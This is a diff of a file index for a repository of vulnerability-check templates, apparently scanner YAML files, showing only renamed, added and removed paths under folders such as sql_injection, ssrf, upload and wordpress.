./poc/remote_code_execution/seacms-rce.yaml ./poc/remote_code_execution/seacms-rce.yml ./poc/remote_code_execution/seacms-v654-rce.yml -./poc/remote_code_execution/seagate-media-rce.yaml ./poc/remote_code_execution/security_products_rce.yaml ./poc/remote_code_execution/seeyon-m1server-usertokenservice-rce.yaml ./poc/remote_code_execution/seeyon-oa-m1server-userTokenService-rce.yaml @@ -46616,8 +46643,8 @@ ./poc/remote_code_execution/vrealize-operations-log4j-rce.yaml ./poc/remote_code_execution/waitlist-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/waitlist-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/remote_code_execution/wangkang-NGFW-rce.yaml -./poc/remote_code_execution/wangkang-ns-asg-rce-1.yaml +./poc/remote_code_execution/wangkang-NS-ASG-rce-1.yaml +./poc/remote_code_execution/wangkang-ngfw-rce.yaml ./poc/remote_code_execution/wangkang-ns-asg-rce-2.yaml ./poc/remote_code_execution/wanhu-ezoffice-rhinoscriptengineservice-rce.yaml ./poc/remote_code_execution/wantit-erp-comboxstore-action-rce.yaml @@ -47147,6 +47174,7 @@ ./poc/search/elasticsearch-5-version.yaml ./poc/search/elasticsearch-7193.yaml ./poc/search/elasticsearch-7194.yaml +./poc/search/elasticsearch-7195.yaml ./poc/search/elasticsearch-7196.yaml ./poc/search/elasticsearch-7197.yaml ./poc/search/elasticsearch-cluster-health.yaml @@ -47167,7 +47195,6 @@ ./poc/search/elasticsearch-sql-client-detect.yaml ./poc/search/elasticsearch-unauth.yml ./poc/search/elasticsearch-unauthorized-access.yaml -./poc/search/elasticsearch.yaml ./poc/search/elasticsearch.yml ./poc/search/elasticsearch5-log4j-rce.yaml ./poc/search/events-search-addon-for-the-events-calendar-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -47285,9 +47312,9 @@ ./poc/sensitive/zenphoto-sensitive-info-4.yaml ./poc/sensitive/zenphoto-sensitive-info.yaml ./poc/sharepoint/exposed-sharepoint-list-7344.yaml +./poc/sharepoint/exposed-sharepoint-list-7345.yaml ./poc/sharepoint/exposed-sharepoint-list-7346.yaml ./poc/sharepoint/exposed-sharepoint-list-7347.yaml -./poc/sharepoint/exposed-sharepoint-list.yaml ./poc/sharepoint/microsoft-sharepoint-detect.yaml ./poc/sharepoint/microsoft-sharepoint.yaml ./poc/sharepoint/sharepoint-workflow.yaml @@ -47307,16 +47334,16 @@ ./poc/shopify/shopify-private-token-11861.yaml ./poc/shopify/shopify-private-token.yaml ./poc/shopify/shopify-public-token.yaml +./poc/shopify/shopify-shared-secret(1).yaml ./poc/shopify/shopify-shared-secret-10200.yaml -./poc/shopify/shopify-shared-secret-11862.yaml ./poc/shopify/shopify-shared-secret.yaml ./poc/shopify/shopify-takeover-10201.yaml ./poc/shopify/shopify-takeover-10202.yaml ./poc/shopify/shopify-takeover-10203.yaml ./poc/shopify/shopify-takeover-10204.yaml ./poc/shopify/shopify-takeover.yaml +./poc/shopify/shopify-token(1).yaml ./poc/shopify/shopify-token-10205.yaml -./poc/shopify/shopify-token-11863.yaml ./poc/shopify/shopify-token.yaml ./poc/shopify/shopify.yaml ./poc/shopify/wpshopify-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -47440,7 +47467,8 @@ ./poc/social/facebook-page.yaml ./poc/social/facebook-phish.yaml ./poc/social/facebook-secret-11849.yaml -./poc/social/facebook-secret.yaml +./poc/social/facebook-secret-7386.yaml +./poc/social/facebook-secrets.yaml ./poc/social/facebook.yaml ./poc/social/feed-instagram-lite-c7da33b8d9c9161563efb555456e6b5a.yaml ./poc/social/feed-instagram-lite-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -47487,7 +47515,7 @@ ./poc/social/kiwi-social-share-b76a016d68785a043e21d76a6c6fcba0.yaml ./poc/social/kiwi-social-share-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/kiwi-social-share-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/social/linkedin-id-11853.yaml +./poc/social/linkedin-id.yaml ./poc/social/linkedin-phish.yaml ./poc/social/linkedin.yaml ./poc/social/mastodon-chaossocial.yaml @@ -47586,9 +47614,9 @@ ./poc/social/twitter-bootstrap-slider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/twitter-cards-meta-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/twitter-cards-meta-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/social/twitter-secret(1).yaml ./poc/social/twitter-secret-10862.yaml ./poc/social/twitter-secret-11870.yaml -./poc/social/twitter-secret.yaml ./poc/social/twitter.yaml ./poc/social/uiuxdevsocial-mastodon-instance.yaml ./poc/social/ultimate-instagram-feed-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -47686,6 +47714,7 @@ ./poc/sql/Ecology-sqli-SignatureDownLoad.yaml ./poc/sql/Ecshop-CollectionList-SQLi.yaml ./poc/sql/EmpireCMS-list-sqli.yaml +./poc/sql/EmpireCMS-rate-sqli.yaml ./poc/sql/Fangweicms-SQLi.yaml ./poc/sql/GLPI-9.3.3-SQL-Injection.yaml ./poc/sql/JCMS-DBCONFIG-FILEREAD.yaml @@ -47715,9 +47744,7 @@ ./poc/sql/Joomla-sqli-com_vikbooking.yaml ./poc/sql/Joomla-sqli-googlesearch.yaml ./poc/sql/Joomla-sqli-registrationpro.yaml -./poc/sql/Kingdee-sqli.yaml ./poc/sql/LBS-SQLi.yaml -./poc/sql/MagicFlow-sqli.yaml ./poc/sql/Mallbuilder-404_key-SQLi.yaml ./poc/sql/Mallbuilder-Change_statusPHP-SQLi.yaml ./poc/sql/Mallbuilder-Index-SQLi.yaml @@ -47816,6 +47843,7 @@ ./poc/sql/Mallbuilder-user_order_username-SQLi.yaml ./poc/sql/Mallbuilder-user_read_rec_username-SQLi.yaml ./poc/sql/Mallbuilder-wap_key-SQLi.yaml +./poc/sql/Maticsoft-Shop-sqli.yaml ./poc/sql/Metinfo-V5_0_admin_memeber_getpassword-SQLi.yaml ./poc/sql/Metinfo-V5_1_7_job_php-BindSQLi.yaml ./poc/sql/Metinfo-V5_2_12-SQLi.yaml @@ -47826,7 +47854,6 @@ ./poc/sql/Metinfo-V5_3_search_php-SQLi.yaml ./poc/sql/Metinfo-img_php-SQLi.yaml ./poc/sql/Metinfo-login_check-SQLi.yaml -./poc/sql/Netoray-sqli.yaml ./poc/sql/OA-SQL.yaml ./poc/sql/OpenText-LiveSite-TeamSite-Database-info-Exposure.yaml ./poc/sql/PHPOK-SQLi.yaml @@ -47947,10 +47974,10 @@ ./poc/sql/amazon-affiliate-link-localizer-3e6b0794d274a22198ec583b9db374b8.yaml ./poc/sql/amerisale-re-0bcd5e6f648c26dbe80dedf2a6385eae.yaml ./poc/sql/amss-sqli.yaml -./poc/sql/android-debug-database-exposed-312.yaml ./poc/sql/android-debug-database-exposed-313.yaml ./poc/sql/android-debug-database-exposed-314.yaml ./poc/sql/android-debug-database-exposed-315.yaml +./poc/sql/android-debug-database-exposed.yaml ./poc/sql/apache-couchdb.yaml ./poc/sql/apache-loadbalancer-364.yaml ./poc/sql/apache-loadbalancer.yaml @@ -48004,6 +48031,7 @@ ./poc/sql/brocade-data-angle-guard-database.yaml ./poc/sql/browser_SQl.yaml ./poc/sql/bsqli-time-based.yaml +./poc/sql/bsqli.yaml ./poc/sql/btoptionscom-bnb-sqli.yaml ./poc/sql/btoptionscom-financial-sqli.yaml ./poc/sql/btoptionscom-hbr_php-sqli.yaml @@ -48011,9 +48039,9 @@ ./poc/sql/buddyforms-b1bff743ade02d08e4ca219946b52db7.yaml ./poc/sql/buddypress-26cd09463a563f5bdbf1737d253ac338.yaml ./poc/sql/buddypress-media-09db3ed600715ed39882e0075ad496ac.yaml -./poc/sql/buildbot-panel-802.yaml ./poc/sql/buildbot-panel-803.yaml ./poc/sql/buildbot-panel.yaml +./poc/sql/buildbot-panel.yml ./poc/sql/bws-popular-posts-5c1610bc60d7438db1e35e11fc9ca98b.yaml ./poc/sql/cacti-sql-info.yaml ./poc/sql/caldera-forms-a80dbec0757ce762ea8fc25e3da60b45.yaml @@ -48077,11 +48105,11 @@ ./poc/sql/core-control-ede63358db5237caf285f7deba2c611c.yaml ./poc/sql/corner-ad-f38db89ce8dd0a9c4d3abb2c40bc849b.yaml ./poc/sql/couchdb-admin-party.yaml +./poc/sql/couchdb-adminparty-1234.yaml ./poc/sql/couchdb-adminparty-1235.yaml ./poc/sql/couchdb-adminparty-1236.yaml ./poc/sql/couchdb-adminparty-1237.yaml ./poc/sql/couchdb-adminparty.yaml -./poc/sql/couchdb-adminparty.yml ./poc/sql/couchdb-cve-2017-12635.yml ./poc/sql/couchdb-detect.yaml ./poc/sql/couchdb-exposure-1238.yaml @@ -48234,7 +48262,6 @@ ./poc/sql/elasticsearch-sql-client-detect.yaml ./poc/sql/elegance-e6998b25801bfa9dbabfae7a038d5dab.yaml ./poc/sql/email-artillery-e6bdf53a60bdc7f9dbaa8f6b47717135.yaml -./poc/sql/empirecms-rate-sqli.yaml ./poc/sql/ems-sqli.yaml ./poc/sql/error-based-get-sql-injection.yaml ./poc/sql/error-based-post-sql-injection.yaml @@ -48256,9 +48283,9 @@ ./poc/sql/exposed-adb-7282.yaml ./poc/sql/exposed-adb.yaml ./poc/sql/exposed-mysql-initial-7321.yaml -./poc/sql/exposed-mysql-initial-7322.yaml ./poc/sql/exposed-mysql-initial-7323.yaml ./poc/sql/exposed-mysql-initial-7324.yaml +./poc/sql/exposed-mysql-initial.yaml ./poc/sql/exposed-sqlite-manager-1.yaml ./poc/sql/exposed-sqlite-manager-2.yaml ./poc/sql/exposed-sqlite-manager-7349.yaml @@ -48399,7 +48426,8 @@ ./poc/sql/kevinlab-bems-sqli-8457.yaml ./poc/sql/kevinlab-bems-sqli-8458.yaml ./poc/sql/kevinlab-bems-sqli-8459.yaml -./poc/sql/kevinlab-bems-sqli.yaml +./poc/sql/kevinlab-bems-sqli-8460.yaml +./poc/sql/kingdee-sqli.yaml ./poc/sql/konzept-42c151a3ad2acc06652db4e511d6034f.yaml ./poc/sql/landray-eis-rpt-listreport-definefield-sqli.yaml ./poc/sql/lazy-load-819db9a5bf7acd6096bdff345baa5fc4.yaml @@ -48414,12 +48442,12 @@ ./poc/sql/login-with-azure-01b93f2dbc0d04168ef7aa280be01887.yaml ./poc/sql/lws-affiliation-30d4419a179de45efd589a882f05dbfc.yaml ./poc/sql/magic-post-thumbnail-ccc7771aaedb79d810ecb689585d56c8.yaml +./poc/sql/magicflow-sqli.yaml ./poc/sql/mainwp-article-uploader-extension-292bb79797b219e92f73ddb0416aa694.yaml ./poc/sql/mainwp-child-58c8f5d69615f602d92d90394db9d64f.yaml ./poc/sql/master-slider-ed288c6c3345f1ffb55b84c20815db6e.yaml ./poc/sql/master-slider-fda4296ee577901bd01db008680a73fe.yaml ./poc/sql/material-dashboard-2-by-creative-sql-injection.yaml -./poc/sql/maticsoft-shop-sqli.yaml ./poc/sql/mcms-list-do-sqli.yaml ./poc/sql/mdb-database-file-8795.yaml ./poc/sql/mdb-database-file-8796.yaml @@ -48476,6 +48504,7 @@ ./poc/sql/mz-mindbody-api-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/sql/mz-mindbody-api-fca0be0e46f35ce98ffc349ba57e202a.yaml ./poc/sql/mz-mindbody-api-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/sql/netoray-sqli.yaml ./poc/sql/netwin-dbabble.yaml ./poc/sql/newsletter-by-supsystic-466dcf8e4e9a002d112948258edb5d41.yaml ./poc/sql/newspaper-a89f41cc43cdb51913109cc90cee59b5.yaml @@ -48975,7 +49004,6 @@ ./poc/sql/yith-woocommerce-wishlist-96db56825f3804eea351db0949dce178.yaml ./poc/sql/yongyou-ICurrtype-sqli.yaml ./poc/sql/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml -./poc/sql/yongyou-icurrtype-sqli.yaml ./poc/sql/yongyou-jdbcRead.yaml ./poc/sql/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/sql/yongyou-u8-RegisterServlet-sql-Injection.yaml @@ -49092,6 +49120,7 @@ ./poc/sql_injection/Ecology-sqli-SignatureDownLoad.yaml ./poc/sql_injection/Ecshop-CollectionList-SQLi.yaml ./poc/sql_injection/EmpireCMS-list-sqli.yaml +./poc/sql_injection/EmpireCMS-rate-sqli.yaml ./poc/sql_injection/Fangweicms-SQLi.yaml ./poc/sql_injection/JCMS-Downfile_Jsp-SQLi.yaml ./poc/sql_injection/JCMS-Index_Jsp-SQLi.yaml @@ -49118,9 +49147,7 @@ ./poc/sql_injection/Joomla-sqli-com_vikbooking.yaml ./poc/sql_injection/Joomla-sqli-googlesearch.yaml ./poc/sql_injection/Joomla-sqli-registrationpro.yaml -./poc/sql_injection/Kingdee-sqli.yaml ./poc/sql_injection/LBS-SQLi.yaml -./poc/sql_injection/MagicFlow-sqli.yaml ./poc/sql_injection/Mallbuilder-404_key-SQLi.yaml ./poc/sql_injection/Mallbuilder-Change_statusPHP-SQLi.yaml ./poc/sql_injection/Mallbuilder-Index-SQLi.yaml @@ -49219,6 +49246,7 @@ ./poc/sql_injection/Mallbuilder-user_order_username-SQLi.yaml ./poc/sql_injection/Mallbuilder-user_read_rec_username-SQLi.yaml ./poc/sql_injection/Mallbuilder-wap_key-SQLi.yaml +./poc/sql_injection/Maticsoft-Shop-sqli.yaml ./poc/sql_injection/Metinfo-V5_0_admin_memeber_getpassword-SQLi.yaml ./poc/sql_injection/Metinfo-V5_1_7_job_php-BindSQLi.yaml ./poc/sql_injection/Metinfo-V5_2_12-SQLi.yaml @@ -49229,7 +49257,6 @@ ./poc/sql_injection/Metinfo-V5_3_search_php-SQLi.yaml ./poc/sql_injection/Metinfo-img_php-SQLi.yaml ./poc/sql_injection/Metinfo-login_check-SQLi.yaml -./poc/sql_injection/Netoray-sqli.yaml ./poc/sql_injection/PHPOK-SQLi.yaml ./poc/sql_injection/PHPSHE-SQLi.yaml ./poc/sql_injection/Qibocms-SQLi.yaml @@ -49290,6 +49317,7 @@ ./poc/sql_injection/beescms_v4-login-sqli.yaml ./poc/sql_injection/blind-sqli.yaml ./poc/sql_injection/bsqli-time-based.yaml +./poc/sql_injection/bsqli.yaml ./poc/sql_injection/btoptionscom-bnb-sqli.yaml ./poc/sql_injection/btoptionscom-financial-sqli.yaml ./poc/sql_injection/btoptionscom-hbr_php-sqli.yaml @@ -49354,7 +49382,6 @@ ./poc/sql_injection/ecshop-sqli-7180.yaml ./poc/sql_injection/ecshop-sqli-7181.yaml ./poc/sql_injection/ecshop-sqli.yaml -./poc/sql_injection/empirecms-rate-sqli.yaml ./poc/sql_injection/ems-sqli.yaml ./poc/sql_injection/errorbased_sqli.yaml ./poc/sql_injection/etouch-v2-sqli-7265.yaml @@ -49411,11 +49438,12 @@ ./poc/sql_injection/kevinlab-bems-sqli-8457.yaml ./poc/sql_injection/kevinlab-bems-sqli-8458.yaml ./poc/sql_injection/kevinlab-bems-sqli-8459.yaml -./poc/sql_injection/kevinlab-bems-sqli.yaml +./poc/sql_injection/kevinlab-bems-sqli-8460.yaml +./poc/sql_injection/kingdee-sqli.yaml ./poc/sql_injection/landray-eis-rpt-listreport-definefield-sqli.yaml ./poc/sql_injection/leaguemanager-sqli.yaml ./poc/sql_injection/loancms-sqli.yaml -./poc/sql_injection/maticsoft-shop-sqli.yaml +./poc/sql_injection/magicflow-sqli.yaml ./poc/sql_injection/mcms-list-do-sqli.yaml ./poc/sql_injection/metinfo-cve-2019-16996-sqli.yml ./poc/sql_injection/metinfo-cve-2019-16997-sqli.yml @@ -49425,6 +49453,7 @@ ./poc/sql_injection/msvod-sqli.yaml ./poc/sql_injection/msvod-sqli.yml ./poc/sql_injection/mysql-sqli.yaml +./poc/sql_injection/netoray-sqli.yaml ./poc/sql_injection/niushop-sqli.yaml ./poc/sql_injection/notificationx-sqli.yaml ./poc/sql_injection/oob_sqli-2.yaml @@ -49543,7 +49572,6 @@ ./poc/sql_injection/xdcms-sqli.yaml ./poc/sql_injection/yongyou-ICurrtype-sqli.yaml ./poc/sql_injection/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml -./poc/sql_injection/yongyou-icurrtype-sqli.yaml ./poc/sql_injection/yongyou-u8-oa-sqli-11746.yaml ./poc/sql_injection/yongyou-u8-oa-sqli-11747.yaml ./poc/sql_injection/yongyou-u8-oa-sqli.yaml @@ -49766,7 +49794,6 @@ ./poc/ssrf/BlindSSRF-98.yaml ./poc/ssrf/BlindSSRF-99.yaml ./poc/ssrf/HIKVISION-iSecure-Center-proxy-ssrf.yaml -./poc/ssrf/SPON-IP-SSRF.yaml ./poc/ssrf/Wehsphere-SSRF.yaml ./poc/ssrf/anheng-mingyu-xmlrpc-sock-ssrf.yaml ./poc/ssrf/apache-httpd-cve-2021-40438-ssrf.yaml @@ -49824,10 +49851,10 @@ ./poc/ssrf/linkerd-ssrf.yaml ./poc/ssrf/microstrategy-ssrf-1.yaml ./poc/ssrf/microstrategy-ssrf-2.yaml -./poc/ssrf/microstrategy-ssrf-8859.yaml ./poc/ssrf/microstrategy-ssrf-8860.yaml ./poc/ssrf/microstrategy-ssrf-8861.yaml ./poc/ssrf/microstrategy-ssrf.yaml +./poc/ssrf/microstrategy-ssrf.yml ./poc/ssrf/openbmcs-ssrf-9261.yaml ./poc/ssrf/openbmcs-ssrf.yaml ./poc/ssrf/openfire-cve-2019-18394-ssrf.yml @@ -49838,6 +49865,7 @@ ./poc/ssrf/resin-inputfile-fileread-or-ssrf.yml ./poc/ssrf/response-ssrf.yaml ./poc/ssrf/skype-blind-ssrf.yaml +./poc/ssrf/spon-ip-ssrf.yaml ./poc/ssrf/ssrf-blind-host.yaml ./poc/ssrf/ssrf-blind.yaml ./poc/ssrf/ssrf-by-proxy.yaml @@ -50460,7 +50488,7 @@ ./poc/upload/qianxin-legendsec-SecGate-upload.yaml ./poc/upload/qianxin-secgate3600-syshandupfile-upload-rce.yaml ./poc/upload/qianxin-secworld-secgate-3600-fileupload.yaml -./poc/upload/qihang-media-upload.yaml +./poc/upload/qihang-media-upload_all.yaml ./poc/upload/qiniu-uploader-00fa1d2ba63df2c928dce8c2e7130935.yaml ./poc/upload/qiniu-uploader-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/upload/qiniu-uploader-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -50519,8 +50547,8 @@ ./poc/upload/ueditor-file-upload-10872.yaml ./poc/upload/ueditor-file-upload-10873.yaml ./poc/upload/ueditor-file-upload-10874.yaml -./poc/upload/ueditor-file-upload-10875.yaml ./poc/upload/ueditor-file-upload-10876.yaml +./poc/upload/ueditor-file-upload.yaml ./poc/upload/ueditor-upload.yaml ./poc/upload/ueditor-uploadVul.yaml ./poc/upload/ueditor_1433_net-upload-catchimage.yaml @@ -50528,7 +50556,7 @@ ./poc/upload/unauthenticated-popup-upload-10920.yaml ./poc/upload/unauthenticated-popup-upload-10921.yaml ./poc/upload/unauthenticated-popup-upload-10922.yaml -./poc/upload/unauthenticated-popup-upload.yaml +./poc/upload/unauthenticated-popup-upload-10923.yaml ./poc/upload/uploadOperation.yaml ./poc/upload/uploader-1eeb96e6fdd259a25fc3126ec95fe69f.yaml ./poc/upload/uploader-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -50716,6 +50744,7 @@ ./poc/web/WEB-product_db-Downlaod.yaml ./poc/web/Web-xml-finder.yaml ./poc/web/WebGateway-ifcfg_db-Downlaod.yaml +./poc/web/Webtalk-leakage.yaml ./poc/web/Wordpress-NMedia_Website_Contact_Form-FileInclude.yaml ./poc/web/a2b-webserver.yaml ./poc/web/abyss-web-server-11.yaml @@ -50749,15 +50778,15 @@ ./poc/web/archibus-webcentral-panel.yaml ./poc/web/artica-web-proxy-detect-543.yaml ./poc/web/artica-web-proxy-detect-544.yaml -./poc/web/artica-web-proxy-detect-545.yaml ./poc/web/artica-web-proxy-detect-546.yaml +./poc/web/artica-web-proxy-detect.yaml ./poc/web/artica-web-proxy-workflow.yaml ./poc/web/automatedlogiccorporation-webctrl.yaml ./poc/web/avtech-video-web-server.yaml ./poc/web/axel-webserver.yaml ./poc/web/axigen-webadmin-659.yaml +./poc/web/axigen-webadmin-660.yaml ./poc/web/axigen-webadmin-661.yaml -./poc/web/axigen-webadmin.yaml ./poc/web/axigen-webmail-662.yaml ./poc/web/axigen-webmail-663.yaml ./poc/web/axigen-webmail.yaml @@ -50867,7 +50896,7 @@ ./poc/web/formassembly-web-forms-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/fortiweb-panel-7537.yaml ./poc/web/fortiweb-panel-7538.yaml -./poc/web/fortiweb-panel.yaml +./poc/web/fortiweb-panel-7539.yaml ./poc/web/friendweb.yaml ./poc/web/g-web-shop-238f655f125fd9eb47ac850e4dd0308d.yaml ./poc/web/g-web-shop-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -50889,7 +50918,7 @@ ./poc/web/geowebcache.yaml ./poc/web/geowebserver-detector.yaml ./poc/web/geowebserver-workflow.yaml -./poc/web/git-web-interface-7713.yaml +./poc/web/git-web-interface.yaml ./poc/web/gitweb.yaml ./poc/web/golden-dragon-card-ecard-website-query-subsystem.yaml ./poc/web/h2-database-web-console-unauthorized-access.yml @@ -50931,7 +50960,7 @@ ./poc/web/hp-laserjet-p4515-webserver.yaml ./poc/web/huawei-inner-web.yaml ./poc/web/huawei-vpn-umweb-fileread.yaml -./poc/web/ibm-mqseries-web-console.yaml +./poc/web/ibm-mqseries-web-console-8109.yaml ./poc/web/ibm-web-traffic-express-caching-proxy.yaml ./poc/web/ibm-webseal.yaml ./poc/web/ibm-websphere-admin-panel.yaml @@ -50944,7 +50973,7 @@ ./poc/web/icewarp-webclient-rce-8130.yaml ./poc/web/icewarp-webclient-rce-8131.yaml ./poc/web/icewarp-webclient-rce-8132.yaml -./poc/web/icewarp-webclient-rce.yaml +./poc/web/icewarp-webclient-rce-8133.yaml ./poc/web/icinga-web-login-8134.yaml ./poc/web/icinga-web-login-8135.yaml ./poc/web/icinga-web-login-8136.yaml @@ -51138,6 +51167,7 @@ ./poc/web/tenweb-speed-optimizer-d36e99557d96772d6f9b2db3a42a86da.yaml ./poc/web/tenweb-speed-optimizer-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/tenweb-speed-optimizer-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/web/titannit-web-exposure.yaml ./poc/web/titannit-web-rce.yaml ./poc/web/topfreeweb-charging.yaml ./poc/web/toshiba-topaccess-webserver.yaml @@ -51174,8 +51204,8 @@ ./poc/web/web-framework-detect.yaml ./poc/web/web-ftp-detect-11135.yaml ./poc/web/web-ftp-detect-11136.yaml +./poc/web/web-ftp-detect-11137.yaml ./poc/web/web-ftp-detect-11138.yaml -./poc/web/web-ftp-detect.yaml ./poc/web/web-instant-messenger-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/web-instant-messenger-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/web-local-craft-11139.yaml @@ -51311,7 +51341,6 @@ ./poc/web/websphere-version-detect.yaml ./poc/web/websvn-workflow.yaml ./poc/web/websvn.yaml -./poc/web/webtalk-leakage.yaml ./poc/web/webtitan-cloud-panel.yaml ./poc/web/webtools-home-11169.yaml ./poc/web/webtools-home.yaml @@ -51832,7 +51861,7 @@ ./poc/wordpress/trilithic-viewpoint-login-10837.yaml ./poc/wordpress/trilithic-viewpoint-login-10838.yaml ./poc/wordpress/trilithic-viewpoint-login-10839.yaml -./poc/wordpress/trilithic-viewpoint-login.yaml +./poc/wordpress/trilithic-viewpoint-login-10840.yaml ./poc/wordpress/twpro.yaml ./poc/wordpress/update-wordpress-plugin-templates.yml ./poc/wordpress/userswp-c29f62e03d546cc27c6dbe34a5329897.yaml @@ -51845,6 +51874,7 @@ ./poc/wordpress/viewpoint-system-status.yaml ./poc/wordpress/wanhu-ezoffice-wpsservlet-fileupload.yaml ./poc/wordpress/weekender-newspaper-wp-theme-open-redirect.yaml +./poc/wordpress/wordpress-LFI.yaml ./poc/wordpress/wordpress-accessible-wpconfig-1.yaml ./poc/wordpress/wordpress-accessible-wpconfig-10.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11.yaml @@ -51973,7 +52003,6 @@ ./poc/wordpress/wordpress-installer-log-11291.yaml ./poc/wordpress/wordpress-installer-log-11292.yaml ./poc/wordpress/wordpress-installer-log.yaml -./poc/wordpress/wordpress-lfi(1).yaml ./poc/wordpress/wordpress-login-11293.yaml ./poc/wordpress/wordpress-login-11294.yaml ./poc/wordpress/wordpress-login-11295.yaml @@ -52083,8 +52112,8 @@ ./poc/wordpress/wordpress-wordfence-lfi-11348.yaml ./poc/wordpress/wordpress-wordfence-lfi-11349.yaml ./poc/wordpress/wordpress-wordfence-lfi-11350.yaml +./poc/wordpress/wordpress-wordfence-lfi-11351.yaml ./poc/wordpress/wordpress-wordfence-lfi-11352.yaml -./poc/wordpress/wordpress-wordfence-lfi.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11355.yaml @@ -52295,7 +52324,7 @@ ./poc/wordpress/wp-custom-tables-xss-11432.yaml ./poc/wordpress/wp-custom-tables-xss-11433.yaml ./poc/wordpress/wp-custom-tables-xss-11434.yaml -./poc/wordpress/wp-custom-tables-xss.yaml +./poc/wordpress/wp-custom-tables-xss-11435.yaml ./poc/wordpress/wp-database-backup-7456b5ac9fc9f670e1e253f7b90328b9.yaml ./poc/wordpress/wp-database-backup-8be1a31ad975657badff4879d64c690a.yaml ./poc/wordpress/wp-database-backup-b1ef3e484d1d283c367083fe137d799b.yaml @@ -52902,7 +52931,7 @@ ./poc/wordpress/wp-simple-fields-lfi-11568.yaml ./poc/wordpress/wp-simple-fields-lfi-11569.yaml ./poc/wordpress/wp-simple-fields-lfi-11570.yaml -./poc/wordpress/wp-simple-fields-lfi.yaml +./poc/wordpress/wp-simple-fields-lfi-11571.yaml ./poc/wordpress/wp-simple-login-registration-plugin-57522d43f8326c121f710f6482e3a001.yaml ./poc/wordpress/wp-simple-login-registration-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-simple-login-registration-plugin-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -52952,8 +52981,8 @@ ./poc/wordpress/wp-spell-check-d370838451213d71f30fae588768f2c7.yaml ./poc/wordpress/wp-spell-check-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-spell-check-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/wordpress/wp-spot-premium-lfi-11583.yaml ./poc/wordpress/wp-spot-premium-lfi-11584.yaml -./poc/wordpress/wp-spot-premium-lfi.yaml ./poc/wordpress/wp-spreadplugin-770922d0f06223ff760fe55a3381969b.yaml ./poc/wordpress/wp-spreadplugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-spreadplugin-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -53183,7 +53212,7 @@ ./poc/wordpress/wpdm-cache-session-11436.yaml ./poc/wordpress/wpdm-cache-session-11437.yaml ./poc/wordpress/wpdm-cache-session-11438.yaml -./poc/wordpress/wpdm-cache-session-11439.yaml +./poc/wordpress/wpdm-cache-session.yaml ./poc/wordpress/wpe-indoshipping-10dbcd54baca6e6ee04759bca5983c58.yaml ./poc/wordpress/wpe-indoshipping-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wpe-indoshipping-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -53248,7 +53277,7 @@ ./poc/wordpress/wpmudev-pub-keys-11504.yaml ./poc/wordpress/wpmudev-pub-keys-11505.yaml ./poc/wordpress/wpmudev-pub-keys-11506.yaml -./poc/wordpress/wpmudev-pub-keys.yaml +./poc/wordpress/wpmudev-pub-keys-11507.yaml ./poc/wordpress/wpparallax-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wpparallax-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wpremote-661833c53cf53d611a603a6a8adc3242.yaml @@ -53411,8 +53440,8 @@ ./poc/xss/basic-xss-prober-695.yaml ./poc/xss/basic-xss-prober-696.yaml ./poc/xss/basic-xss-prober-697.yaml -./poc/xss/basic-xss-prober-698.yaml ./poc/xss/basic-xss-prober-699.yaml +./poc/xss/basic-xss-prober.yaml ./poc/xss/bitrix-getmessage-xss.yaml ./poc/xss/bitrix-recalc-xss-galleries.yaml ./poc/xss/bitrix-xss.yaml @@ -53464,12 +53493,12 @@ ./poc/xss/discourse-xss-7013.yaml ./poc/xss/discourse-xss-7014.yaml ./poc/xss/discourse-xss.yaml -./poc/xss/dom-xss-7078.yaml ./poc/xss/dom-xss-7079.yaml ./poc/xss/dom-xss-7080.yaml ./poc/xss/dom-xss-siteminder.yaml ./poc/xss/dom-xss-web-message.yaml ./poc/xss/dom-xss.yaml +./poc/xss/dom-xss.yml ./poc/xss/drupal-avatar-xss.yaml ./poc/xss/drupal_module-fraction-xss-vulnerability.yaml ./poc/xss/dzzoffice-xss.yaml @@ -53555,8 +53584,8 @@ ./poc/xss/microweber-xss.yaml ./poc/xss/mida-eframework-xss-8866.yaml ./poc/xss/mida-eframework-xss-8867.yaml -./poc/xss/mida-eframework-xss-8868.yaml ./poc/xss/mida-eframework-xss-8869.yaml +./poc/xss/mida-eframework-xss.yaml ./poc/xss/modula-image-gallery-xss.yaml 